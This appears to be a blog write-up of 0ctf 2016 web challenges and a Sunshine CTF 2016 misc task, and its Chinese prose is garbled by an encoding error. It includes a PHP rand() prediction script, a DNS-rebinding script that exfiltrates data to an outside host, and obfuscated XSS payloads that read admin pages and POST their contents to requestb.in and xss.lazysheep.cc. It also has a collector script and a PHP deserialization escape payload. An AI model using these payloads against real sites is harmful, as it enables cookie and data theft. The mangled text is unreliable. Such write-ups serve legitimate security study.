LoRexxar's Blog

0ctf2016 && sunshinectf2016 writeup

2016/03/14

涓婁釜鍛ㄦ湯鎵撲簡涓徏鍙肩殑0ctf锛岀粨鏋溾滃闄㈡淳鈥濈殑鎰ゆ掑氨鏄湅浠涔堥鐩兘鏄竴绡囩瘒鏂囩尞鈥eb鐙楃畝鐩磋檺浜嗕竴鍦帮紝椤轰究闄勪笂sunshine ctf misc300鐨剋riteup锛堜竴涓病鏈墂eb棰樼洰鐨勬瘮璧汷rz锛夆

0ctf2016

rand2

棰樼洰鏄槦鍙嬪仛鐨勶紝涓嶆槸寰堟噦锛岄渶瑕佺鎾炲嚭闅忔満鏁帮紝鍦1mins浠ュ唴銆
鍏堢粰2涓埆浜虹殑writeup:
http://www.isecer.com/ctf/0ctf_2016_web_writeup_rand_2.html
https://github.com/p4-team/ctf/tree/master/2016-03-12-0ctf/rand_2

棣栧厛鏄鐩殑婧愮爜锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
include('config.php');
session_start();
if($_SESSION['time'] && time() - $_SESSION['time'] > 60) {
session_destroy();
die('timeout');
} else {
$_SESSION['time'] = time();
}
echo rand();
if (isset($_GET['go'])) {
$_SESSION['rand'] = array();
$i = 5;
$d = '';
while($i--){
$r = (string)rand();
$_SESSION['rand'][] = $r;
$d .= $r;
}
echo md5($d);
} else if (isset($_GET['check'])) {
if ($_GET['check'] === $_SESSION['rand']) {
echo $flag;
} else {
echo 'die';
session_destroy();
}
} else {
show_source(__FILE__);
}

闅忔満鏁板湪Keep-live涓嬫槸鍙互琚娴嬬殑銆
http://drops.hduisa.cn/archives/365/

棰勬祴鏂规硶锛
state[i] = state[i-3] + state[i-31]
return state[i] >> 1

杩樻湁鏂囩尞锛
https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
import re
import hashlib
import time
cookie = {"PHPSESSID": "2okdf7k5e637e1fms75t0a1hg4"}
heade = {"Connection": "Keep-Alive"}
#url = "http://127.0.0.1/test.php"
url = "http://202.120.7.202:8888"
url2 = "http://202.120.7.202:8888/?go="
session = requests.session()
def test():
ran_num = []
for i in range(31):
req = session.get(url, cookies=cookie, headers=heade)
cont = req.content
try:
num = re.findall(r'(.+)<code>',cont)[0]
except:
print i
return 0
ran_num.append(int(num))
req = session.get(url2, cookies=cookie, headers=heade)
cont = req.content
ran_num.append(int(cont[1:-32]))
md5_num = cont[-32:-1]
#print md5_num
go_num = []
for x in range(3):
y = 32 + x
tem_num1 = ran_num[y-3]+ran_num[y-31]
bin_num = bin(tem_num1)
tem_num2 = int(bin_num[0:2] + bin_num[3:], 2)
go_num.append([str(tem_num1), str(tem_num2)])
for x in range(2):
e = x + 4
add_list = []
for y in range(2):
tem_num1 = int(go_num[x][y]) + ran_num[e]
bin_num = bin(tem_num1)
tem_num2 = int(bin_num[0:2] + bin_num[3:], 2)
add_list.append(str(tem_num1))
add_list.append(str(tem_num2))
go_num.append(add_list)
print go_num
# for x in range(5):
# req = session.get(url, cookies=cookie, headers=heade)
# cont = req.content
# num = re.findall(r'(.+)<code>',cont)[0]
# print num
for a in go_num[0]:
for b in go_num[1]:
for c in go_num[2]:
for d in go_num[3]:
for e in go_num[4]:
now_num = a + b + c + d + e
now_md5 = hashlib.md5(now_num).hexdigest()
if md5_num == now_md5:
print "yes"
break
x = 32
now_num = ""
# for i in range(5):
# y = x + i
# num1 = ran_num[y - 3] + ran_num[y - 31]
# bin_num = bin(num1)
# #if len(bin_num) >= 32:
# # num2 = num1
# #else:
# num2 = int(bin_num[0:2] + bin_num[3:], 2)
# #now_num += str(num)
# req = session.get(url, cookies=cookie, headers=heade)
# cont = req.content
# num3 = re.findall(r'(.+)<code>',cont)[0]
# ran_num.append(int(num3))
# #print num3, "===>",num2
# print num3, "===>", num1," and " ,num2
def suc():
global ran_num
num5 = ran_num[-5:]
url3 = "http://202.120.7.202:8888/?"
for x in num5:
url3 += "check[]="+str(x) + "&"
req = session.get(url3, cookies=cookie, headers=heade)
print req.content
#print now_md5
#print md5_num
if __name__ == '__main__':
res = test()
# while not res:
# try:
# res = test()
# except:
# res = False
# print "yyy"
# time.sleep(1)
# suc()

闃熷弸鍛婅瘔鎴戣鍒囩墖鍒囬敊浜嗭紝鎵浠ユ病鍑篺lag锛孫rZ鈥︹.

Monkey (璺ㄥ悓婧愮瓥鐣)

棣栧厛鏄竴涓猰d5纰版挒锛屾湰浠ヤ负寰堥夯鐑︼紝鍚庢潵鍙戠幇鍏跺疄灏辨槸鐩稿綋浜庨獙璇佺爜绫讳技鐨勪笢瑗裤

1
2
3
4
5
6
7
8
9
10
11
import random
import hashlib
str = 10000
while 1:
m2 = hashlib.md5()
m2.update(repr(str))
if (m2.hexdigest()[0:6]=='bfb93d'):
print str
break
str+=1

鐒跺悗灏濊瘯閫氳繃<img><iframe>璇讳笢瑗匡紝鍙戠幇鐢变簬鍚屾簮绛栫暐鎬庝箞閮借涓嶅埌銆
鐪嬩簡鍒汉鐨剋riteup:

http://www.isecer.com/ctf/0ctf_2016_web_writeup_monkey.html
https://w00tsec.blogspot.jp/2016/03/0ctf-2016-write-up-monkey-web-4.html

鐭ラ亾鏄氳繃涓浜涚绉樼殑鎵嬫锛岄鍏堟槸瑕侀氳繃ajax CORS璺ㄥ煙锛岀劧鍚庢妸鍩熷悕瑙f瀽鍒127.0.0.1,鐒跺悗璁板緱鏀惧湪8080绔彛锛屽湪浠栨墦寮骞跺仠鐣欑殑鏃跺欙紝瑙f瀽锛屽氨鍙互浜哋rz(楹婚夯闂垜涓轰粈涔堣藩鐫鎵撳瓧)
鏈嶅姟鍣ㄨ剼鏈被浼间簬杩欐牱

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<script src="jquery.min.js"></script>
<script>
function getdata(){
$.ajax({
type: "GET",
url:'http://xxx.com:8080/secret',
async: true,
error: function(request) {
getdata();
},
success: function(data) {
$.get('http://yourdomain/get.php?data='+data);
}
});
}
getdata();
</script>
`

guestbook1 (bypass xss filter)

棰樼洰瀹屽叏鏄鍗′綇浜嗭紝鏄敤浜嗕袱涓粦榄旀硶杩囧垽鏂殑锛屽鐜颁簡寰堜箙鎵嶆垚鍔熴備富瑕佹槸鐪嬩簡杩欑瘒鍗氬
http://security.szurek.pl/0ctf-2016-guestbook-1-writeup.html

鏈鍙肩殑鏄繖涓汉閫氳繃鐚滄祴鍑犱箮澶嶇幇浜嗛鐩殑婧愮爜锛屾湁鍏磋叮鍙互鍘昏瘯璇曘
绋嶅井娴嬭瘯鍙互鍙戠幇<>'"琚繃婊わ紝鐒跺悗username浼氳鏀惧湪id鍜屽唴瀹逛袱涓湴鏂癸紝text杩欓噷鏈変竴涓叧浜巇ebug鐨勫垽鏂

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<body>
<div><h3>to be checked</h3></div>
<script>var debug=false;</script>
<div id="dsadsa">
<h2>dsadsa</h2>
</div>
<div id="text">dsadsa</div>
<script>
data = "dsadsa"
t = document.getElementById("text")
if(debug){
t.innerHTML=data
}else{
t.innerText=data
}
</script>
</body>

鏈変釜鎻愮ず鏄痓oss浣跨敤鐨勬槸chrome锛屾湰鏉ヤ互涓篶hrome杩欎釜鏄父瑙勭幆澧冿紝鍏跺疄杩欓噷鐢ㄤ簡涓涓粦榄旀硶銆
鍏充簬chrome xss auditor
Before rendering the response in the Document Object Model presented to the user, XSS auditor searches for instances of (malicious) parameters sent in the original request. If a detection is positive, the auditor is triggered and the response is 鈥渞ewritten鈥 to a non-executable state in the browser DOM.

鎴栬浣犺嫳鏂囦笉濂斤紝鎴戜篃鏄湅鐨勫崐鐭ュ崐瑙o紝涓婇潰杩欒瘽鐨勬剰鎬濆氨鏄痗hrome浼氭娴嬩綘鐨勮姹傦紝濡傛灉鏈夌被浼间簬<script>var debug=false</script>杩欐牱鐨勮姹傦紝chrome浼氭妸杩欎釜鍒濆鍖栧拷瑙嗘帀锛屾垜浠笉浠呴渶瑕佸拷瑙嗚繖涓彉閲忥紝杩橀渶瑕佸垵濮嬪寲涓涓嬶紝杩欓噷灏遍渶瑕乽sername杩欓噷浼氭妸浼犲叆鐨勫兼斁鍏d鐨勯棶棰樹簡銆

鎴戜滑闇瑕佹瀯閫<div id="debug">鑷充簬杩欓噷涓轰粈涔堟瀯閫爄d灏卞彲浠ュ垵濮嬪寲debug鐨勯棶棰橈紝涔熸槸姣旇緝绁炲鐨勩

http://stackoverflow.com/questions/3434278/do-dom-tree-elements-with-ids-become-global-variables

娌℃湁寰堢湅鎳傦紝浣嗘槸锛屽ぇ姒傛槑鐧絛ebug琚垵濮嬪寲涓涓璞★紝杩欐牱鍙互璋冪敤Orz銆

鍓嶉潰鐨勯棶棰橀兘瑙e喅浜嗭紝涓嬮潰灏辨槸瑕佹瀯閫燿omxss璇锋眰浜嗐

1
2
3
4
5
6
payload = 'xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","http://requestb.in/xxxx",false);xmlhttp.send();'
out = []
for s in payload:
out.append(str(ord(s)))
print "\\x3cimg src=a onerror=\\u0022eval(String.fromCharCode("+", ".join(out)+"))\\u0022\\x3e"

鐢变簬鍗曞紩鍙峰拰鍙屽紩鍙疯杩囨护锛屾墍浠ラ渶瑕佺敤eval+string.fromCharCode鐨勬柟寮忔潵杩囪姹備簡銆

1
2
3
4
5
6
7
8
Secret:
random_characters_must_be_unique<script>var debug=false;</script>
Username:
debug
Message:
\x3cimg src=a onerror=\u0022eval(String.fromCharCode(120, 109, 108, 104, 116, 116, 112, 61, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 41, 59, 120, 109, 108, 104, 116, 116, 112, 46, 111, 112, 101, 110, 40, 34, 71, 69, 84, 34, 44, 34, 104, 116, 116, 112, 58, 47, 47, 114, 101, 113, 117, 101, 115, 116, 98, 46, 105, 110, 47, 120, 120, 120, 120, 34, 44, 102, 97, 108, 115, 101, 41, 59, 120, 109, 108, 104, 116, 116, 112, 46, 115, 101, 110, 100, 40, 41, 59))\u0022\x3e

杩欓噷娉ㄦ剰\浼氳杞箟锛屾墍浠ヨ浼犲叆\鎵嶆槸涓涓
鍏堝啓涓剼鏈敓鎴恗essage(鎷栦釜鏈嬪弸鐨勪笂鏉ワ紝鐩存帴post鍑哄幓):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/bin/env python
#-*- encoding: utf-8 -*-
import os
import requests
import random
import string
def post(s,u,m):
r = requests.session()
if len(u) < 1:
u = 'debug'
_data = {
"secret":s,
"username":u,
"message":m,
"action":"submit"
}
res = r.post("http://202.120.7.201:8888/message.php", data=_data)
return res.url
def rstr(n=10):
return string.join(random.sample(['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a'], n)).replace(' ','')
def m2s(m):
r = ''
for x in m:
r += ','+str(x)
return r[1:]
if __name__ == '__main__':
s = '<script>var debug=false;</script>'
payload = 'xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","/admin/show.php",false);xmlhttp.send();r=xmlhttp.responseText;xmlhttp.responseText;xmlhttp.open("POST","http://xss.lazysheep.cc",false);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("vv="+escape(r));'
l = m2s(map(ord, payload))
p2 = '\\\\x3cimg src=a onerror=\\\\u0022eval(String.fromCharCode(' + l + '))\\\\u0022\\\\x3e'
print post(rstr()+s, 'debug', p2)

寰楀埌浜嗕竴浜涗笢瑗匡細

1
<html> <!-- change log: use http-only cookie to prevent cookie stealing by xss, so flag is safe in cookie always check /admin/server_info.php for load balancing to do: files and folders permission control, disallow other users write file into uploads folder --> <body> <script>var debug=false;</script> <div id=""> <h2></h2> </div> <div id="text"></div> <script> data = "" t = document.getElementById("text") if(debug){ t.innerHTML=data }else{ t.innerText=data } </script> </body> </html>

浠栨槸璇磋鎴戜滑鍘绘鏌/admin/server_info.php杩欎釜鏂囦欢銆傛墦寮鐪嬫槸phpinfo()

鍥犱负cookie鏄痟ttp-only鐨勶紝鎵浠ラ氳繃js鐨勬柟寮忔槸寰椾笉鍒扮殑锛屼絾鏄彲浠ラ氳繃request涓槸濮嬬粓瀛樺湪鐨勩

1
payload = 'xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","/admin/server_info.php",false);xmlhttp.send();r=xmlhttp.responseText;xmlhttp.responseText;xmlhttp.open("POST","http://requestb.in/xxxx",false);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("vv="+escape(r));'

杩欐牱灏卞彲浠ュ緱鍒颁粬鐨凱hpinfo()

1
<td class="e">_COOKIE["flag"]</td><td class="v">0ctf{httponly_sometimes_not_so_secure}</td></tr> <tr><td class="e">_COOKIE["admin"]</td><td class="v">salt_is_admin</td></tr>

鏈鍚庤繖涓姝ヤ笉鐭ラ亾涓轰粈涔堟病鍔炴硶澶嶇幇锛屾湅鍙嬬粰鎴戜簡浠栫殑php鎺ュ彈鏂瑰紡

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$data = "get : ".urldecode(urldecode($_SERVER['QUERY_STRING']));
$data .= "\r\npost : ".urldecode(urldecode(file_get_contents("php://input")));
$data .= "\r\nip : ".$_SERVER["REMOTE_ADDR"];
$data .= "\r\nREFERER : ".$_SERVER['HTTP_REFERER'];
$data .= "\r\nHTTP_USER_AGENT : ".$_SERVER['HTTP_USER_AGENT'];
$data .= "\r\nREQUEST_METHOD : ".$_SERVER['REQUEST_METHOD'];
$data .= "\r\nCookies : ".implode(' ',$_COOKIES);
if(strlen($data)>10){
file_put_contents("get.txt","### ".date("Y-m-d H:m:s")." ###\r\n".$data."\r\n", FILE_APPEND);
}
exit();
?>

杩欐牱灏卞彲浠ユ帴鏀跺埌get.txt锛屾墦寮鐪嬪氨get浜嗏

piapiapia(php鍙嶅簭鍒楀寲閫冮稿瓧绗)

鍏堢粰鍒汉鐨剋riteup
http://www.isecer.com/ctf/0ctf_2016_web_writeup_piapiapia.html

婧愮爜灏辨噿寰椾紶浜嗭紝鏈夊叴瓒e彲浠ラ棶鎴戣锛岄氳涓閬嶅彂鐜伴棶棰樺彲鑳藉嚭鍦ㄥ簭鍒楀寲涓婇潰锛屽厛鐪嬬湅杩囨护

1
2
3
4
5
6
7
8
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}

鎰熻闂鍦╱pdate.php涓

1
2
3
4
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);

鏈変竴涓湁闂鐨勫垽鏂槸nickname鐨勫垽鏂

1
2
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');

鐮旂┒浜嗕笅濡傛灉浼犲叆鐨勬槸鏁扮粍鐨勮瘽锛岃繖閲岀殑涓や釜鍒ゆ柇閮借兘杩

姝e父浼犲叆鐨勮瘽锛屾槸姝e父鐨勮鍙

1
a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:17:"email@email.email";s:8:"nickname";a:1:{i:0;s:3:"xxx";}s:5:"photo";s:39:"upload/0cc175b9c0f1b6a831c399e269772661";}

搴忓垪鍖栧鍙嬩弗鏍肩殑闀垮害鐨勶紝濡傛灉闀垮害閿欒锛岃В搴忓垪鍖栧氨鏄細鎶ラ敊鍋滄銆
鎴戜滑闇瑕佽瘯鍥炬瀯閫犱竴涓nickname[]=xxx";}s:5:"photo";s:10:"config.php杩欐牱濡傛灉婧㈠嚭锛屽氨鑳借鍙朿onfig.php鐨勪俊鎭

杩欓噷鏈変釜闂涓鐩存病鎯虫槑鐧斤紝鐪嬩簡writeup鎵嶇煡閬撹繖閲屾槸閫氳繃filter閲岀殑where->hacker浼氭孩鍑轰竴涓瓧绗︼紝杩欐牱濡傛灉浼犲叆鍜岄渶瑕佹孩鍑虹殑涓鏍烽暱鐨剋here锛屽氨浼氭孩鍑轰竴涓畬鏁寸殑璇锋眰锛屽氨涓嶄細鎶ラ敊銆

1
nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php

get!

guestbook2

writeup杩樻病鍑猴紝鍏堝崰鍧戙

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
total 100
drwxr-xr-x 22 root root 4096 Mar 9 14:53 .
drwxr-xr-x 22 root root 4096 Mar 9 14:53 ..
drwxr-xr-x 2 root root 4096 Mar 7 14:25 bin
drwxr-xr-x 3 root root 4096 Mar 7 14:26 boot
drwxr-xr-x 15 root root 4100 Mar 13 13:11 dev
drwxr-xr-x 96 root root 4096 Mar 13 13:20 etc
-r--r----- 1 flag flag 29 Mar 9 13:59 flag
-r-sr-x--- 1 flag www-data 8709 Mar 9 14:52 flag_reader
drwxr-xr-x 5 root root 4096 Mar 9 13:59 home
lrwxrwxrwx 1 root root 32 Mar 7 14:26 initrd.img -> boot/initrd.img-4.2.0-30-generic lrwxrwxrwx 1 root root 32 Mar 7 22:07 initrd.img.old -> boot/initrd.img-4.2.0-27-generic drwxr-xr-x 21 root root 4096 Mar 9 00:17 lib
drwxr-xr-x 2 root root 4096 Mar 7 22:07 lib64
drwx------ 2 root root 16384 Mar 7 22:07 lost+found
drwxr-xr-x 3 root root 4096 Mar 7 22:07 media
drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt
drwxr-xr-x 2 root root 4096 Feb 18 07:12 opt
dr-xr-xr-x 129 root root 0 Mar 13 13:11 proc
drwx------ 10 root root 4096 Mar 14 07:03 root
drwxr-xr-x 19 root root 720 Mar 14 22:22 run
drwxr-xr-x 2 root root 4096 Mar 7 14:25 sbin
drwxr-xr-x 2 root root 4096 Feb 18 07:12 srv
dr-xr-xr-x 13 root root 0 Mar 13 14:29 sys
drwxrwxrwt 2 root root 4096 Mar 15 13:09 tmp
drwxr-xr-x 10 root root 4096 Mar 7 22:07 usr
drwxr-xr-x 13 root root 4096 Mar 8 23:24 var
lrwxrwxrwx 1 root root 29 Mar 7 14:26 vmlinuz -> boot/vmlinuz-4.2.0-30-generic
lrwxrwxrwx 1 root root 29 Mar 7 22:07 vmlinuz.old -> boot/vmlinuz-4.2.0-27-generic

鍙戠幇浜唂lag锛屼絾鏄涓嶄簡锛岀湅鍒版湁涓猣lag_reader锛岃窇涓涓嬪氨濂姐

鏉冮檺姣旇緝楂橈紝缈荤炕鍒殑

1
2
3
4
5
total 20 drwxr-xr-x 5 root root 4096 Mar 9 13:59 .
drwxr-xr-x 22 root root 4096 Mar 9 14:53 ..
drwxr-xr-x 2 flag flag 4096 Mar 9 13:59 flag
drwxrwx--- 2 root guestbook 4096 Mar 14 06:29 guestbook
drwxr-xr-x 3 ops ops 4096 Mar 7 14:36 ops

gusetbook娌′笢瑗匡紝鐪嬬湅鏈洰褰曞惂

1
2
3
4
5
6
7
8
9
total 36 drwxr-xr-x 5 root root 4096 Mar 13 14:02 .
drwxr-xr-x 3 root root 4096 Mar 8 23:23 ..
drw-r-x--- 2 root www-data 4096 Mar 13 14:16 admin
-rw-r-x--- 1 root www-data 193 Mar 6 00:58 config.php
-rw-r-x--- 1 root www-data 1578 Mar 10 11:05 index.php
-rw-r-x--- 1 root www-data 684 Feb 27 23:11 message.php
-rw-r-x--- 1 root www-data 1077 Mar 9 23:03 show.php
drw-r-x--- 2 root www-data 4096 Mar 6 01:12 static
drwx-wx-wx 3 root www-data 4096 Mar 15 13:25 uploads

sunshine ctf2016

鎰熻鎸烘湁鎰忔濈殑涓涓瘮璧涳紝鏄經缃楅噷杈惧ぇ瀛︿妇鍔炵殑ctf锛屾墍鏈夌殑棰樼洰涓嶆槸misc灏辨槸pwn锛屾劅瑙夋瘮杈冨潙锛屼絾鏄敱浜庡ぇ閮ㄥ垎棰樼洰姣旇緝鍩虹锛屾尯鏈夋剰鎬濈殑锛屽挨鍏舵槸鍋氫簡涓閬撴瘮杈冩湁鎰忔濈殑misc棰樼洰銆

Floridaman found this cool new invite only internet relay chat service but he can鈥檛 figure out how to actually get an invite鈥 since you鈥檙e not a part of the Florida education system, maybe you can figure it out. http://4.31.182.246:4567

棰樻剰澶ф鏄浣涚綏閲岃揪man鎯宠繘涓涓亰澶╁锛屼絾鏄笉鐭ラ亾鎬庝箞鑾峰緱閭璇凤紝鎵撳紑绔欏彂鐜版湁涓湴鏂硅緭鍏reenode涓婄殑棰戦亾鍜屽瘑鐮侊紝閭d箞灏辫緭鍏ヤ竴涓惂锛屽湪freenode涓婅繘鍏ヨ亰澶╁鍙戠幇杩涙潵浜嗕竴涓檶鐢熶汉璇

杈撳叆!flag 杩欐牱鐨勮瘉鏄庤嚜宸憋紝绋嶅井娴嬭瘯浜嗕竴涓嬪彂鐜拌緭鍏ヤ細鏈変汉绉佽亰浣犺繕宸灏戜釜瀛楃锛屽紑濮嬩互涓鸿繖涓湴鏂规槸绫讳技浜庢埅鏂尮閰嶇殑锛屼絾鏄悗鏉ュ彂鐜板ソ鍍忎笉鏄繖鏍风殑銆

鍏坒uzz涓涓嬪彂鐜拌杈撳叆12涓瓧绗︼紝鐒跺悗鍖呮嫭Flagrsd810杩欏嚑涓紝鐒跺悗缁忚繃闀胯揪1涓皬鏃剁殑娴嬭瘯鍙戠幇锛屾瘡涓瓧绗﹀悗闈㈠彲浠ヨ窡鐨勫瓧绗︿笉鍚岋紝鍞湁F鏄悗闈㈠彲浠ヨ窡闄よ嚜宸变互澶栫殑鏁板瓧锛8鏄竴瀹氳鏀惧湪鏈鍚庨潰锛屽彂鐜颁簡涓浜涜寰嬪悗灏辨祴璇曞惂鈥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
cookie = {"__cfduid": "d489d3a9976cf50fa718050f32c4607201457848341","PAH":"alpha3"}
url = "https://webchat.freenode.net/dynamic/alpha/e/p?r=ea69282e77352a34d3696d90247dbc17&t=827"
a = "Flagrsd810"
#a = "OPQRSTUVWXYZ"
for x in a:
cont = "PRIVMSG #ddog :!flag F" + x
data = {"s": "d3542650d359032fe7deecf5f4479e5d", "c": cont}
req =requests.post(url, data=data, cookies=cookie)

缁忚繃鍙嶅鐨勬祴璇曞彲浠ユ祴璇曞嚭濡傛灉鍙互鎶婅繖10涓瓧姣嶆寜椤哄簭鏀捐繘鍘伙紝鍙槸灞呯劧杩樻湁2涓噸澶嶇殑鍛紝鍙堟槸涓椤縡uzzing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
cookie = {"__cfduid": "d489d3a9976cf50fa718050f32c4607201457848341","PAH":"alpha3"}
url = "https://webchat.freenode.net/dynamic/alpha/e/p?r=ea69282e77352a34d3696d90247dbc17&t=827"
a = "Flagrsd810"
#a = "OPQRSTUVWXYZ"
for x in a:
cont = "PRIVMSG #ddog :!flag Fl0rdda1sgr8"
data = {"s": "d3542650d359032fe7deecf5f4479e5d", "c": cont}
req =requests.post(url, data=data, cookies=cookie)

鐒跺悗鍙戠幇灞呯劧鏄經缃楅噷杈锯.mdzz鈥.杩欏氨鏄枃鍖栧樊寮傚晩鈥..

CATALOG
  1. 1. 0ctf2016
    1. 1.1. rand2
    2. 1.2. Monkey (璺ㄥ悓婧愮瓥鐣)
    3. 1.3. guestbook1 (bypass xss filter)
    4. 1.4. piapiapia(php鍙嶅簭鍒楀寲閫冮稿瓧绗)
    5. 1.5. guestbook2
  2. 2. sunshine ctf2016